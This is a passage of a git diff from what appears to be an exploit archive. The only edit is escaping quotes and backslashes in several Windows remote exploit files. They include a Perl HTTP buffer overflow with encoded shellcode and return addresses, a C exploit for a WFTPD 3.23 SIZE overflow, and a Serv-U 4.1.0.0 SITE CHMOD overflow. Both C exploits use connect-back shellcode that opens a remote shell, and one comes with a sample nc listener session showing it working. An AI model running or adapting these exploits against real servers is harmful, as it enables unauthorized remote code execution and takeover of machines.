-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
-"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58".
-"\x4e\x46\x46\x32\x46\x52\x4b\x48\x45\x44\x4e\x33\x4b\x38\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58".
-"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x58".
-"\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34".
-"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x58".
-"\x49\x48\x4e\x46\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d".
-"\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x58\x42\x34\x4e\x30\x4b\x48".
-"\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x54\x4a\x30\x50\x35\x4a\x46".
-"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46".
-"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x47".
-"\x44\x33\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
-"\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e".
-"\x48\x36\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30".
-"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
-"\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x35\x43\x55\x43\x35\x43\x44".
-"\x43\x35\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x31".
-"\x4e\x45\x48\x56\x43\x55\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a".
-"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x56\x42\x51".
-"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52".
-"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d".
-"\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x4f\x4f\x48\x4d".
-"\x42\x35\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
-"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x35\x4f\x4f\x48\x4d\x45\x45".
-"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x56\x43\x46".
-"\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
-"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x41\x43\x42\x4c".
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x42\x50\x4f\x44\x54\x4e\x32".
-"\x43\x39\x4d\x58\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46".
-"\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
-"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x55\x41\x35\x41\x35\x4c\x56".
-"\x41\x30\x41\x55\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x56".
-"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36".
-"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f".
-"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d".
-"\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d".
-"\x4f\x4f\x42\x4d\x5a";
+\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".
+\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".
+\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".
+\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".
+\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\".
+\"\\x4d\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x58\".
+\"\\x4e\\x46\\x46\\x32\\x46\\x52\\x4b\\x48\\x45\\x44\\x4e\\x33\\x4b\\x38\\x4e\\x47\".
+\"\\x45\\x30\\x4a\\x47\\x41\\x50\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x31\\x4b\\x58\".
+\"\\x4f\\x35\\x42\\x32\\x41\\x30\\x4b\\x4e\\x49\\x44\\x4b\\x58\\x46\\x33\\x4b\\x48\".
+\"\\x41\\x50\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x58\\x42\\x4c\".
+\"\\x46\\x37\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\".
+\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x52\\x4a\\x32\\x45\\x57\\x45\\x4e\\x4b\\x58\".
+\"\\x4f\\x35\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x48\\x4e\\x50\\x4b\\x34\".
+\"\\x4b\\x48\\x4f\\x45\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x43\\x30\\x4e\\x52\\x4b\\x58\".
+\"\\x49\\x48\\x4e\\x46\\x46\\x32\\x4e\\x31\\x41\\x36\\x43\\x4c\\x41\\x43\\x4b\\x4d\".
+\"\\x46\\x56\\x4b\\x58\\x43\\x44\\x42\\x33\\x4b\\x58\\x42\\x34\\x4e\\x30\\x4b\\x48\".
+\"\\x42\\x47\\x4e\\x31\\x4d\\x4a\\x4b\\x58\\x42\\x54\\x4a\\x30\\x50\\x35\\x4a\\x46\".
+\"\\x50\\x38\\x50\\x34\\x50\\x50\\x4e\\x4e\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x48\\x46\".
+\"\\x43\\x35\\x48\\x56\\x4a\\x46\\x43\\x53\\x44\\x53\\x4a\\x46\\x47\\x47\\x43\\x47\".
+\"\\x44\\x33\\x4f\\x55\\x46\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\".
+\"\\x4e\\x4f\\x4b\\x53\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x4f\\x45\\x49\\x38\\x45\\x4e\".
+\"\\x48\\x36\\x41\\x38\\x4d\\x4e\\x4a\\x50\\x44\\x30\\x45\\x55\\x4c\\x46\\x44\\x30\".
+\"\\x4f\\x4f\\x42\\x4d\\x4a\\x46\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x45\".
+\"\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x43\\x35\\x43\\x35\\x43\\x55\\x43\\x35\\x43\\x44\".
+\"\\x43\\x35\\x43\\x44\\x43\\x35\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4a\\x46\\x41\\x31\".
+\"\\x4e\\x45\\x48\\x56\\x43\\x55\\x49\\x48\\x41\\x4e\\x45\\x59\\x4a\\x46\\x46\\x4a\".
+\"\\x4c\\x41\\x42\\x37\\x47\\x4c\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x42\\x51\".
+\"\\x41\\x55\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x46\\x4a\\x4d\\x4a\\x50\\x52\".
+\"\\x49\\x4e\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x45\\x45\\x4f\\x4f\\x42\\x4d\".
+\"\\x4a\\x36\\x45\\x4e\\x49\\x54\\x48\\x48\\x49\\x54\\x47\\x35\\x4f\\x4f\\x48\\x4d\".
+\"\\x42\\x35\\x46\\x35\\x46\\x55\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x43\\x59\\x4a\\x46\".
+\"\\x47\\x4e\\x49\\x57\\x48\\x4c\\x49\\x57\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x45\\x45\".
+\"\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4c\\x46\\x46\\x46\\x48\\x36\\x4a\\x56\\x43\\x46\".
+\"\\x4d\\x46\\x49\\x38\\x45\\x4e\\x4c\\x56\\x42\\x55\\x49\\x35\\x49\\x52\\x4e\\x4c\".
+\"\\x49\\x38\\x47\\x4e\\x4c\\x46\\x46\\x34\\x49\\x38\\x44\\x4e\\x41\\x43\\x42\\x4c\".
+\"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x34\\x4d\\x42\\x50\\x4f\\x44\\x54\\x4e\\x32\".
+\"\\x43\\x39\\x4d\\x58\\x4c\\x47\\x4a\\x53\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46\".
+\"\\x44\\x47\\x50\\x4f\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x47\\x46\\x54\\x4f\\x4f\".
+\"\\x48\\x4d\\x4b\\x45\\x47\\x45\\x44\\x55\\x41\\x55\\x41\\x35\\x41\\x35\\x4c\\x56\".
+\"\\x41\\x30\\x41\\x55\\x41\\x55\\x45\\x55\\x41\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x56\".
+\"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x36\".
+\"\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\\x42\\x4d\\x4b\\x58\\x47\\x45\\x4e\\x4f\".
+\"\\x43\\x58\\x46\\x4c\\x46\\x46\\x4f\\x4f\\x48\\x4d\\x44\\x35\\x4f\\x4f\\x42\\x4d\".
+\"\\x4a\\x56\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x35\\x43\\x35\\x4f\\x4f\\x48\\x4d\".
+\"\\x4f\\x4f\\x42\\x4d\\x5a\";
 
 $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
-                              PeerPort => '80',
-                              Proto    => 'tcp');
+                              PeerPort => \'80\',
+                              Proto    => \'tcp\');
 
-$ret = "\x4b\x4f\x9e\x01";	# JMP ESI Win2k SP4 German
-$x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSAAAAUUUUVVVVWWWWXXXXYYYYZZZZ"
-."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSBBBBUUUUVVVVWWWWXXXXYYYYZZZZ"
-."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS".$ret."UUUUVVVVWWWWXXXXYYYYZZZZ"
-."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSDDDDUUUUVVVVWWWWXXXXYYYYZZZZ"
-."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSEEEEUUUUVVVVWWWWXXXXYYYYZZZZ";
-$a = "A" x 2000 . $x . "\x90" x 100 . $shellcode;
-print $sock "POST http://$a/ HTTP/1.0\r\n\r\n";
+$ret = \"\\x4b\\x4f\\x9e\\x01\";	# JMP ESI Win2k SP4 German
+$x = \"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\\xeb\\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSAAAAUUUUVVVVWWWWXXXXYYYYZZZZ\"
+.\"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\\xeb\\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSBBBBUUUUVVVVWWWWXXXXYYYYZZZZ\"
+.\"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\\xeb\\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS\".$ret.\"UUUUVVVVWWWWXXXXYYYYZZZZ\"
+.\"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\\xeb\\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSDDDDUUUUVVVVWWWWXXXXYYYYZZZZ\"
+.\"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\\xeb\\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSEEEEUUUUVVVVWWWWXXXXYYYYZZZZ\";
+$a = \"A\" x 2000 . $x . \"\\x90\" x 100 . $shellcode;
+print $sock \"POST http://$a/ HTTP/1.0\\r\\n\\r\\n\";
 
 
 while (<$sock>) {
diff --git a/platforms/windows/remote/2233.c b/platforms/windows/remote/2233.c
index 93cfb71ac..eff79a34e 100755
--- a/platforms/windows/remote/2233.c
+++ b/platforms/windows/remote/2233.c
@@ -5,7 +5,7 @@
 * tested on XP SP2 polish, 2000 SP4 polish
 * example..
 
-C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
+C:\\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
 
 [*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
 [*] coded by h07 <h07@interia.pl>
@@ -14,11 +14,11 @@ C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
 [+] sending buffer: ok
 [*] press enter to quit
 
-C:\>nc -l -p 4444
+C:\\>nc -l -p 4444
 Microsoft Windows XP [Wersja 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.
 
-C:\wftpd323>
+C:\\wftpd323>
 */
 
 #include <stdio.h>
@@ -30,26 +30,26 @@ C:\wftpd323>
 
 char shellcode[] =
 
-"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6"
-"\x10\x92\x98\x83\xeb\xfc\xe2\xf4\x4a\x7a\x79\xd5\x5e\xe9\x6d\x67"
-"\x49\x70\x19\xf4\x92\x34\x19\xdd\x8a\x9b\xee\x9d\xce\x11\x7d\x13"
-"\xf9\x08\x19\xc7\x96\x11\x79\xd1\x3d\x24\x19\x99\x58\x21\x52\x01"
-"\x1a\x94\x52\xec\xb1\xd1\x58\x95\xb7\xd2\x79\x6c\x8d\x44\xb6\xb0"
-"\xc3\xf5\x19\xc7\x92\x11\x79\xfe\x3d\x1c\xd9\x13\xe9\x0c\x93\x73"
-"\xb5\x3c\x19\x11\xda\x34\x8e\xf9\x75\x21\x49\xfc\x3d\x53\xa2\x13"
-"\xf6\x1c\x19\xe8\xaa\xbd\x19\xd8\xbe\x4e\xfa\x16\xf8\x1e\x7e\xc8"
-"\x49\xc6\xf4\xcb\xd0\x78\xa1\xaa\xde\x67\xe1\xaa\xe9\x44\x6d\x48"
-"\xde\xdb\x7f\x64\x8d\x40\x6d\x4e\xe9\x99\x77\xfe\x37\xfd\x9a\x9a"
-"\xe3\x7a\x90\x67\x66\x78\x4b\x91\x43\xbd\xc5\x67\x60\x43\xc1\xcb"
-"\xe5\x53\xc1\xdb\xe5\xef\x42\xf0\xb6\x10\x92\x98\xd0\x78\x92\x98"
-"\xd0\x43\x1b\x79\x23\x78\x7e\x61\x1c\x70\xc5\x67\x60\x7a\x82\xc9"
-"\xe3\xef\x42\xfe\xdc\x74\xf4\xf0\xd5\x7d\xf8\xc8\xef\x39\x5e\x11"
-"\x51\x7a\xd6\x11\x54\x21\x52\x6b\x1c\x85\x1b\x65\x48\x52\xbf\x66"
-"\xf4\x3c\x1f\xe2\x8e\xbb\x39\x33\xde\x62\x6c\x2b\xa0\xef\xe7\xb0"
-"\x49\xc6\xc9\xcf\xe4\x41\xc3\xc9\xdc\x11\xc3\xc9\xe3\x41\x6d\x48"
-"\xde\xbd\x4b\x9d\x78\x43\x6d\x4e\xdc\xef\x6d\xaf\x49\xc0\xfa\x7f"
-"\xcf\xd6\xeb\x67\xc3\x14\x6d\x4e\x49\x67\x6e\x67\x66\x78\x62\x12"
-"\xb2\x4f\xc1\x67\x60\xef\x42\x98";
+\"\\x31\\xc9\\x83\\xe9\\xb8\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xb6\"
+\"\\x10\\x92\\x98\\x83\\xeb\\xfc\\xe2\\xf4\\x4a\\x7a\\x79\\xd5\\x5e\\xe9\\x6d\\x67\"
+\"\\x49\\x70\\x19\\xf4\\x92\\x34\\x19\\xdd\\x8a\\x9b\\xee\\x9d\\xce\\x11\\x7d\\x13\"
+\"\\xf9\\x08\\x19\\xc7\\x96\\x11\\x79\\xd1\\x3d\\x24\\x19\\x99\\x58\\x21\\x52\\x01\"
+\"\\x1a\\x94\\x52\\xec\\xb1\\xd1\\x58\\x95\\xb7\\xd2\\x79\\x6c\\x8d\\x44\\xb6\\xb0\"
+\"\\xc3\\xf5\\x19\\xc7\\x92\\x11\\x79\\xfe\\x3d\\x1c\\xd9\\x13\\xe9\\x0c\\x93\\x73\"
+\"\\xb5\\x3c\\x19\\x11\\xda\\x34\\x8e\\xf9\\x75\\x21\\x49\\xfc\\x3d\\x53\\xa2\\x13\"
+\"\\xf6\\x1c\\x19\\xe8\\xaa\\xbd\\x19\\xd8\\xbe\\x4e\\xfa\\x16\\xf8\\x1e\\x7e\\xc8\"
+\"\\x49\\xc6\\xf4\\xcb\\xd0\\x78\\xa1\\xaa\\xde\\x67\\xe1\\xaa\\xe9\\x44\\x6d\\x48\"
+\"\\xde\\xdb\\x7f\\x64\\x8d\\x40\\x6d\\x4e\\xe9\\x99\\x77\\xfe\\x37\\xfd\\x9a\\x9a\"
+\"\\xe3\\x7a\\x90\\x67\\x66\\x78\\x4b\\x91\\x43\\xbd\\xc5\\x67\\x60\\x43\\xc1\\xcb\"
+\"\\xe5\\x53\\xc1\\xdb\\xe5\\xef\\x42\\xf0\\xb6\\x10\\x92\\x98\\xd0\\x78\\x92\\x98\"
+\"\\xd0\\x43\\x1b\\x79\\x23\\x78\\x7e\\x61\\x1c\\x70\\xc5\\x67\\x60\\x7a\\x82\\xc9\"
+\"\\xe3\\xef\\x42\\xfe\\xdc\\x74\\xf4\\xf0\\xd5\\x7d\\xf8\\xc8\\xef\\x39\\x5e\\x11\"
+\"\\x51\\x7a\\xd6\\x11\\x54\\x21\\x52\\x6b\\x1c\\x85\\x1b\\x65\\x48\\x52\\xbf\\x66\"
+\"\\xf4\\x3c\\x1f\\xe2\\x8e\\xbb\\x39\\x33\\xde\\x62\\x6c\\x2b\\xa0\\xef\\xe7\\xb0\"
+\"\\x49\\xc6\\xc9\\xcf\\xe4\\x41\\xc3\\xc9\\xdc\\x11\\xc3\\xc9\\xe3\\x41\\x6d\\x48\"
+\"\\xde\\xbd\\x4b\\x9d\\x78\\x43\\x6d\\x4e\\xdc\\xef\\x6d\\xaf\\x49\\xc0\\xfa\\x7f\"
+\"\\xcf\\xd6\\xeb\\x67\\xc3\\x14\\x6d\\x4e\\x49\\x67\\x6e\\x67\\x66\\x78\\x62\\x12\"
+\"\\xb2\\x4f\\xc1\\x67\\x60\\xef\\x42\\x98\";
 
 void config_shellcode(unsigned long ip, unsigned short port)
   {
@@ -78,22 +78,22 @@ struct hostent *he;
 struct sockaddr_in client;
 WSADATA wsa;
 
-printf("\n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit\n");
-printf("[*] coded by h07 <h07@interia.pl>\n");  
+printf(\"\\n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit\\n\");
+printf(\"[*] coded by h07 <h07@interia.pl>\\n\");  
 
 if(argc < 8)
   {
-  printf("[*] usage:..\n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>\n\n", argv[0]);
-  printf("[*] ID list:\n");
-  printf("[>] 0: XP SP2 polish\n");
-  printf("[>] 1: 2000 SP4 polish\n");
-  printf("[>] 2: XP SP2 english\n");
-  printf("[>] 3: 2000 SP4 english\n");
-  printf("[>] 4: XP SP2 german\n\n");
-  printf("[*] opt - WFTPD option 'restrict to home directory and below'\n");
-  printf("[>] 0: disabled\n");
-  printf("[>] 1: enabled\n\n");
-  printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444\n\n", argv[0]);
+  printf(\"[*] usage:..\\n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>\\n\\n\", argv[0]);
+  printf(\"[*] ID list:\\n\");
+  printf(\"[>] 0: XP SP2 polish\\n\");
+  printf(\"[>] 1: 2000 SP4 polish\\n\");
+  printf(\"[>] 2: XP SP2 english\\n\");
+  printf(\"[>] 3: 2000 SP4 english\\n\");
+  printf(\"[>] 4: XP SP2 german\\n\\n\");
+  printf(\"[*] opt - WFTPD option \'restrict to home directory and below\'\\n\");
+  printf(\"[>] 0: disabled\\n\");
+  printf(\"[>] 1: enabled\\n\\n\");
+  printf(\"[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444\\n\\n\", argv[0]);
   exit(0);   
   } 
 
@@ -104,13 +104,13 @@ opt = atoi(argv[2]);
 
 if((id > 4) || (id < 0))
   {
-  printf("[-] ID error: unknown target\n");
+  printf(\"[-] ID error: unknown target\\n\");
   exit(-1);     
   }  
   
 if((opt > 1) || (opt < 0))
   {
-  printf("[-] opt error: unknown option\n");
+  printf(\"[-] opt error: unknown option\\n\");
   exit(-1);      
   }          
   
@@ -123,7 +123,7 @@ sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 
 if((he = gethostbyname(argv[3])) == NULL)
   {
-  printf("[-] Unable to resolve\n");
+  printf(\"[-] Unable to resolve\\n\");
   exit(-1); 
   }
  
@@ -133,7 +133,7 @@ client.sin_family = AF_INET;
 
 if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
   {
-  printf("[-] error: connect()\n");
+  printf(\"[-] error: connect()\\n\");
   exit(-1);
   }
 
@@ -141,35 +141,35 @@ recv(sock, buffer, BUFF_SIZE -1, 0);
 
 //USER
 memset(buffer, 0, BUFF_SIZE);
-sprintf(buffer, "USER %s\r\n", argv[4]);
+sprintf(buffer, \"USER %s\\r\\n\", argv[4]);
 send(sock, buffer, strlen(buffer), 0);  
 recv(sock, buffer, BUFF_SIZE -1, 0);
-printf("[*] FTP response: %s", buffer);
+printf(\"[*] FTP response: %s\", buffer);
 
 //PASS
 memset(buffer, 0, BUFF_SIZE);
-sprintf(buffer, "PASS %s\r\n", argv[5]);
+sprintf(buffer, \"PASS %s\\r\\n\", argv[5]);
 send(sock, buffer, strlen(buffer), 0);  
 recv(sock, buffer, BUFF_SIZE -1, 0);
-printf("[*] FTP response: %s", buffer);
+printf(\"[*] FTP response: %s\", buffer);
 
-if(strstr(buffer, "530") != 0) exit(-1);
+if(strstr(buffer, \"530\") != 0) exit(-1);
 
 //SIZE
 memset(buffer, 0x90, BUFF_SIZE);
-memcpy(buffer, "SIZE ", 5);
+memcpy(buffer, \"SIZE \", 5);
 
 switch(opt)
   {
   case 0:
     { 
-    memcpy(buffer + 5, "/", 1);
+    memcpy(buffer + 5, \"/\", 1);
     r_len = 531;
     break;
     }
   case 1: 
     {
-    memcpy(buffer + 5, "//", 2);
+    memcpy(buffer + 5, \"//\", 2);
     r_len = 532;
     break;
     }                  
@@ -177,15 +177,15 @@ switch(opt)
 
 memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);          
 *((unsigned long*)(&buffer[r_len])) = eip;
-memcpy(buffer + (r_len + 4), "\r\n\x00", 3);
+memcpy(buffer + (r_len + 4), \"\\r\\n\\x00\", 3);
 
 
 if(send(sock, buffer, strlen(buffer), 0) != -1)
-  printf("[+] sending buffer: ok\n");
+  printf(\"[+] sending buffer: ok\\n\");
   else
-  printf("[-] sending buffer: failed\n");
+  printf(\"[-] sending buffer: failed\\n\");
     
-printf("[*] press enter to quit\n");
+printf(\"[*] press enter to quit\\n\");
 getchar();    
 }
 
diff --git a/platforms/windows/remote/23591.c b/platforms/windows/remote/23591.c
index 057696db0..f96a1c59b 100755
--- a/platforms/windows/remote/23591.c
+++ b/platforms/windows/remote/23591.c
@@ -1,6 +1,6 @@
 source: http://www.securityfocus.com/bid/9483/info
 
-RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 
+RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a \'site chmod\' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 
 
 /*
 software:       Serv-U 4.1.0.0
@@ -41,21 +41,21 @@ unsigned char sc[]={
 0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
 };
 
-char *user="anonymous";
-char *pass="not@for.you";
-char *path="/incoming";
+char *user=\"anonymous\";
+char *pass=\"not@for.you\";
+char *path=\"/incoming\";
 
 void usage(char *argv0) {
-        printf("usage: %s -d <ip_dest> [options]\n",argv0);
-        printf("options:\n");
-        printf(" -d target ip\n");
-        printf(" -p target port (default 21)\n");
-        printf(" -u username to log with (default %s)\n",user);
-        printf(" -s password to log with (default %s)\n",pass);
-        printf(" -w writable directory (default %s)\n",path);
-        printf(" -H listening host (default 127.0.0.1)\n");
-        printf(" -P listening port on host (default 80)\n");
-        printf("\n");
+        printf(\"usage: %s -d <ip_dest> [options]\\n\",argv0);
+        printf(\"options:\\n\");
+        printf(\" -d target ip\\n\");
+        printf(\" -p target port (default 21)\\n\");
+        printf(\" -u username to log with (default %s)\\n\",user);
+        printf(\" -s password to log with (default %s)\\n\",pass);
+        printf(\" -w writable directory (default %s)\\n\",path);
+        printf(\" -H listening host (default 127.0.0.1)\\n\");
+        printf(\" -P listening port on host (default 80)\\n\");
+        printf(\"\\n\");
         exit(1);
 }
 
@@ -69,35 +69,35 @@ int main(int argc, char **argv) {
 
         int delta=423;
         int callebx=0x10077A92; // libeay32.dll
-        char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
-        char chmod[]="SITE CHMOD 777 ";
+        char jmpback[]=\"\\xe9\\xff\\xfe\\xff\\xff\\xeb\\xf9\\x90\\x90\"; // jmp -256
+        char chmod[]=\"SITE CHMOD 777 \";
 
-        printf("[%%]   Serv-u v4.1.0.0 sploit by mandragore\n");
+        printf(\"[%%]   Serv-u v4.1.0.0 sploit by mandragore\\n\");
 
         if (argc<2)
                 usage(argv[0]);
 
-        while((i = getopt(argc, argv, "d:p:u:s:w:H:P:"))!= EOF) {
+        while((i = getopt(argc, argv, \"d:p:u:s:w:H:P:\"))!= EOF) {
                 switch (i) {
-                case 'd':
+                case \'d\':
                         target=inet_addr(optarg);
                         break;
-                case 'p':
+                case \'p\':
                         port=atoi(optarg);
                         break;
-                case 'u':
+                case \'u\':
                         user=optarg;
                         break;
-                case 's':
+                case \'s\':
                         pass=optarg;
                         break;
-                case 'w':
+                case \'w\':
                         path=optarg;
                         break;
-                case 'H':
+                case \'H\':
                         lhost=inet_addr(optarg);
                         break;
-                case 'P':
+                case \'P\':
                         lport=atoi(optarg);
                         break;
                 default:
@@ -109,9 +109,9 @@ int main(int argc, char **argv) {
         if ((target==-1) || (lhost==-1))
                 usage(argv[0]);
 
-        printf("[.] if working you'll have a shell on %s:%d.\n", \
+        printf(\"[.] if working you\'ll have a shell on %s:%d.\\n\", \\
                 inet_ntoa(*(struct in_addr *)&lhost),lport);
-        printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
+        printf(\"[.] launching attack on ftp://%s:%s@%s:%d%s\\n\", \\
                 user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);
 
